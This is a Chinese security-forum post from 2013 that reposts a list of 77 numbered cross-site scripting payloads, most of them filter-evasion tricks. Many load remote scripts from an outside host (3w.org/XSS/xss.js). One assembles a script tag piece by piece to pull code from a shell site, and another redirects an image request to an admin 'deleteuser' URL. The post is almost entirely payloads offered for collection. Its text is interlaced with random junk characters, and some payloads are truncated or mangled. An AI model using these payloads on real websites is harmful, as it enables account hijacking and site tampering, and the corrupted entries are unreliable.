找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2724|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。4 Z5 _# m& j7 E& x: U# m
(1)普通的XSS JavaScript注入7 u+ Y; s; }$ @3 _* z: [6 t9 C7 ^
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 s2 Z: D  X/ H$ G  F& V4 c
(2)IMG标签XSS使用JavaScript命令' j  T5 H" l, U4 L7 J
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ ]# z: C. v. @1 g: I3 I(3)IMG标签无分号无引号$ ?. J( N3 @8 M
<IMG SRC=javascript:alert(‘XSS’)>
9 K; e& @/ x- b' `( V3 a6 S& T' O(4)IMG标签大小写不敏感- Z5 g0 E* K" _; f
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" W$ f2 s; L: J2 a(5)HTML编码(必须有分号)7 x1 o# [. d! X8 K& Q
<IMG SRC=javascript:alert(“XSS”)>
& H5 A5 {5 N$ }(6)修正缺陷IMG标签
% e8 h0 |' M6 t; h( i9 }6 X<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, j7 C. V. C1 [2 B) B( E9 u$ c; a
4 a6 ]7 t: K9 S
(7)formCharCode标签(计算器)
# d, x# R5 \6 G4 B& h<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+ ?: n+ P7 e- m3 }" u(8)UTF-8的Unicode编码(计算器)  j+ H$ Z' }% ]& x# I% y. R3 `
<IMG SRC=jav..省略..S')>+ p! ~' E  c/ w7 n3 J
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% _) n- }* U# e5 w$ Q& E<IMG SRC=jav..省略..S')>, o4 i% K: N; S& e' W
(10)十六进制编码也是没有分号(计算器): d( C7 Q" x1 P' T
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>8 }& ~9 d; \1 m$ n
(11)嵌入式标签,将Javascript分开% ?2 t6 j" g$ O7 l( h
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- C# q7 x1 o5 l- y7 T$ p(12)嵌入式编码标签,将Javascript分开
, L$ {4 I9 G" ^8 l5 A& w1 x2 ]<IMG SRC=”jav ascript:alert(‘XSS’);”>$ Q9 g' N! c: T
(13)嵌入式换行符" n' y. S4 M7 k2 E8 t
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 e6 X  a6 S2 d$ w& D(14)嵌入式回车$ }* |/ G8 U6 M, l9 u  Q; G
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 a: v- @2 f; s7 V(15)嵌入式多行注入JavaScript,这是XSS极端的例子
' Z/ G6 I+ p9 V<IMG SRC=”javascript:alert(‘XSS‘)”>
5 O* E8 [7 c5 t  S- d5 U(16)解决限制字符(要求同页面)' g! ]+ u4 n8 j0 m
<script>z=’document.’</script>% O/ Z' L, z" i
<script>z=z+’write(“‘</script>
! Q/ t' E! {+ z8 `. E<script>z=z+’<script’</script>
+ C4 W+ q( e" z/ a# h/ |. i% F<script>z=z+’ src=ht’</script>
; N) X/ k( W/ r: L0 R& Q: e<script>z=z+’tp://ww’</script>9 X- {' Z4 H( Q0 D0 ]- O. D, T
<script>z=z+’w.shell’</script>+ {; {  \# q, q( G
<script>z=z+’.net/1.’</script>
" G  E  m  w" [, z, y8 S( f1 t<script>z=z+’js></sc’</script>
5 B- I. R) k# s/ x6 x<script>z=z+’ript>”)’</script>( F5 B6 R6 E2 L+ W/ M; g
<script>eval_r(z)</script>
, i8 F; z) ^8 q5 ](17)空字符12-7-1 T00LS - Powered by Discuz! Board* J. E$ [, f/ n9 x2 k' X# k
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
8 w- w0 r4 }1 k) j" Fperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
( J# i3 i( J& L) G(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 n* \) Y+ }8 K& c3 c- `7 s" a
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out. |4 V" D6 l- n* @5 s- Z
(19)Spaces和meta前的IMG标签
4 G% X: [, b. m& o<IMG SRC=” javascript:alert(‘XSS’);”>
) p' _; Q0 u& A1 e$ J# s- q$ P(20)Non-alpha-non-digit XSS6 y# N, `3 v6 @/ X6 c$ V) L5 d2 M
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, ~: z8 L) z7 T5 t9 R, N# h7 o
(21)Non-alpha-non-digit XSS to 2) H) U# N# C6 C6 c1 T  v& x
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ O/ e5 x' j4 N6 Z+ T8 ^8 E
(22)Non-alpha-non-digit XSS to 3% J, c3 e4 V3 y1 g2 V
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 C) c7 N) _+ L* Z1 S(23)双开括号6 q$ h2 Z# @% q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
- b  k( h0 d8 T" R' o" L2 {(24)无结束脚本标记(仅火狐等浏览器)1 |! J( G. B/ [
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
5 k* z1 ]0 ~% c) p% u2 B* c2 s& A3 v* D(25)无结束脚本标记2
& ?. J4 [3 D- x' n& K<SCRIPT SRC=//3w.org/XSS/xss.js>
  u+ }, ]% @* l$ B: i& Z2 q(26)半开的HTML/JavaScript XSS
' \  `+ z# ?+ {( c1 F) z- u<IMG SRC=”javascript:alert(‘XSS’)”
. K$ M" N3 L$ T# ~" B1 A(27)双开角括号
3 ~8 j$ r3 x0 ]+ g<iframe src=http://3w.org/XSS.html <# |8 F* S) P4 c1 c; r
(28)无单引号 双引号 分号
" w% ^& r. q" D- n1 _$ C: ~4 j<SCRIPT>a=/XSS/
0 ~  q6 y- ^/ z3 z9 F, V  z* |alert(a.source)</SCRIPT>
& z& f' y, X  |6 {6 G5 `; J(29)换码过滤的JavaScript" b' z0 ^3 A( E0 M
\”;alert(‘XSS’);//5 H  s0 k& ^+ E" X# _
(30)结束Title标签2 |; I2 j' N* |# Y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( s* c. `: D# w' i% u- E
(31)Input Image
" g1 d/ K1 P1 E# J% J: S- H/ C<INPUT SRC=”javascript:alert(‘XSS’);”>
; t3 t) D* _: h) Q(32)BODY Image8 _; z5 \6 }% O( V* i
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 P7 k( Q- m2 C5 c# {( \3 o1 D- }(33)BODY标签
5 ?& f7 h; s8 W<BODY(‘XSS’)>
- w- G7 ?$ z1 A2 E7 {* A, s(34)IMG Dynsrc. ^, `: n3 y4 W  Z& H3 U9 P
<IMG DYNSRC=”javascript:alert(‘XSS’)”>' T% h; C1 [# Z. m4 y5 \: Z
(35)IMG Lowsrc  f' O0 s& q$ M
<IMG LOWSRC=”javascript:alert(‘XSS’)”>+ q$ ^$ p. n& W* e  R  @1 b
(36)BGSOUND
8 e0 j6 K# E/ |1 t1 x<BGSOUND SRC=”javascript:alert(‘XSS’);”>! B3 z9 }. P. b
(37)STYLE sheet! |% i1 z3 M6 e- Y: V: ]& M
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
# Q, e8 U4 L2 e! C5 R/ D8 O(38)远程样式表% {2 o0 I  i' B, C# B# W4 t8 `
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>/ r* p9 Y% g! v9 ]! S/ G- t7 o8 [
(39)List-style-image(列表式)2 o) z/ ?! o% b/ c4 J) _2 y& X0 [
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 j8 H8 u, K2 O% L1 G
(40)IMG VBscript
+ d) w3 G: B2 H3 R<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS0 F. l0 e2 Z7 C
(41)META链接url* s. W9 e: F6 L; r& w5 B- j8 D
  I2 j: O3 K3 b/ n" S
% @6 k' U1 X6 Q4 C, s5 f0 ?) |
<META HTTP-EQUIV=”refresh” CONTENT=”0;3 H" Y! {7 w3 X
URL=http://;URL=javascript:alert(‘XSS’);”>
4 e) X4 b/ o) h& f% \4 b) r(42)Iframe2 J# d' {, ^8 s! ]
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
1 l$ c% L5 I- h6 }(43)Frame
3 H6 J: \" \) a<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board! r- d6 [: K+ |# T9 Q
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
2 F6 C* m0 X/ A8 Z3 {' W- \0 G(44)Table
3 [; C) k1 h* X9 m' x0 B<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 [! l( e' V9 W- e: E( _1 Z) E- g
(45)TD
  H7 S8 [( o; b0 i- R2 ?<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 u) ^3 E$ E. {2 |: a# k+ m% c8 e- {
(46)DIV background-image
' d4 y4 I# F3 u) g; Q4 i% S<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! V1 z% M+ L! S3 B: Q1 O
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-! ?) e8 A# K" g) K
8&13&12288&65279)3 E/ m  z6 ]$ E" g% P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
# g8 f* t, M! O! ]) v(48)DIV expression
9 b6 R' M" S. h2 x, w* ^" l' I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
7 |$ i' K* Z% Q0 Z6 t% L+ @2 Y(49)STYLE属性分拆表达
( x% ^1 k8 u& o( J& T( \, @5 C<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( H/ l+ D  Y5 P9 Y
(50)匿名STYLE(组成:开角号和一个字母开头)
# e* |1 n" G  B( W) C<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>1 \) q; }# Z  x% P( u  H
(51)STYLE background-image5 u0 Z8 G( b/ k; ?' z% |2 [
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A+ K! ~  c; a3 H' M/ `6 H9 z
CLASS=XSS></A>
; e- K5 x1 t( T( l(52)IMG STYLE方式
% j% f/ U0 S4 Rexppression(alert(“XSS”))’>
6 q1 X' c) L9 ^1 Z2 [, i$ Q0 F(53)STYLE background
/ `1 s" n2 A% V2 G! }& B<STYLE><STYLE
. T* }3 r9 V+ m' x3 Utype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 }) `& @* z1 v3 o- W(54)BASE
! W4 P7 w7 B* f, {' c<BASE HREF=”javascript:alert(‘XSS’);//”>
5 t: Y! n1 p8 n. G(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
0 e; p0 Q6 Z' F3 C1 D. |<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
0 @! G/ h% S5 ?' N(56)在flash中使用ActionScrpt可以混进你XSS的代码
. @. a& d' S, n6 za=”get”;
1 V, f% z0 B; h" Q6 j, Gb=”URL(\”";
( ]) E. e7 T5 ]) uc=”javascript:”;0 q! E8 I3 V4 A7 V1 @/ U+ Y% n
d=”alert(‘XSS’);\”)”;
: w2 D$ m  |1 X7 geval_r(a+b+c+d);
% I# v% {: f1 j0 x( l4 m1 E(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上( c8 h7 _  P' b! p( O% }
<HTML xmlns:xss>
$ S9 c% O# E- b, n: t+ J" z& i<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
( G4 l$ C: b- }7 I; U6 F<xss:xss>XSS</xss:xss>, `# _% o2 U& g. Z, q2 }+ v( Z
</HTML># Q0 n/ e+ R: N# ^( @
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用( P: P% J3 k/ ?
<SCRIPT SRC=””></SCRIPT>
5 R" z- _# w* b# z! }$ p(59)IMG嵌入式命令,可执行任意命令, j5 \, M9 c2 U- v( F. o" H  i
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' W! J( z, L2 I4 X! m3 j1 Q* z5 L5 l$ P(60)IMG嵌入式命令(a.jpg在同服务器)0 i1 I. w4 w/ P! y" }0 j1 `' f6 I
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 E* I" x5 H. ~  ~$ C(61)绕符号过滤
, @, I& o/ G' ^8 ?6 ~4 O! I( H6 ^<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 R* b" X' E. K  P- T% k: a8 w# c(62)( _: T$ @  [) |* }# O
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>" P5 x" n5 _2 {* N2 E* B5 ~, J
(63). G# h; G8 }) a# Q9 i1 S( M; U9 w
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>1 L1 v$ n/ b% E- w
(64)
) i$ l. j0 r& ?) j4 H<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>. S$ u; _* K" @, |2 C
(65)
( R/ D& _/ p9 @7 ?* S' c0 J; h<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>0 F- }" n. t1 [& u; C
(66)12-7-1 T00LS - Powered by Discuz! Board
8 f1 p$ ]. ]* M" Bhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
6 ]5 E3 K9 j7 _4 K: e! r% O<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ P" |/ P. M2 j: g% S(67)
9 H6 |, J+ Y- U, D, [<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
" M9 e/ g8 Z8 J0 q# y  u; _- ]</SCRIPT>! L  V% e# ~. [. G" l( p- |
(68)URL绕行
: c* ^) B! z7 u4 m* ^<A HREF=”http://127.0.0.1/”>XSS</A>
1 B9 h* x- B5 e7 B4 s4 a. K! c(69)URL编码
" T& }, b* ?" F* l8 l0 I<A HREF=”http://3w.org”>XSS</A>
' \: s: N# @$ I: ^" Z: A(70)IP十进制
1 [* P& G3 m2 f0 x<A HREF=”http://3232235521″>XSS</A>
' l$ }8 @" u7 K- p! k(71)IP十六进制. o  J' M! c4 P; h& N2 J1 t$ U
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
& x) {, n8 T5 y; k1 X0 x0 Y(72)IP八进制( I$ q. y. \" A7 ?( w7 W6 O
<A HREF=”http://0300.0250.0000.0001″>XSS</A>  Z1 t$ A4 ~; T# {" \5 @3 |& F9 F3 V6 _
(73)混合编码( m0 I- g0 i8 m" U/ s# A$ L
<A HREF=”h
) w. `/ r. b( J# ]4 vtt p://6 6.000146.0×7.147/”">XSS</A>
4 J5 P2 m& O3 K- C- ]& j" t1 P(74)节省[http:]# T) u4 O7 @8 z5 A
<A HREF=”//www.google.com/”>XSS</A>8 j: L& Q1 ?# Y- o$ T  x! b
(75)节省[www]
; Y3 r6 T9 E) w# I: a<A HREF=”http://google.com/”>XSS</A>1 g1 j% E- i; }5 C8 f( B$ X+ u
(76)绝对点绝对DNS
9 a3 J0 p: u5 ]4 E9 ]<A HREF=”http://www.google.com./”>XSS</A>
3 q( q' W& L7 w$ z" v8 V(77)javascript链接# Q& [2 z, Q# i
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>* |( f( r, O' e$ }. Y' Y
  g& W8 S% U) F% \/ B
原文地址:http://fuzzexp.org/u/0day/?p=144 i7 @8 P" d" ]( e. W
' l. F* [! [4 C' \& q9 B+ Y! ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表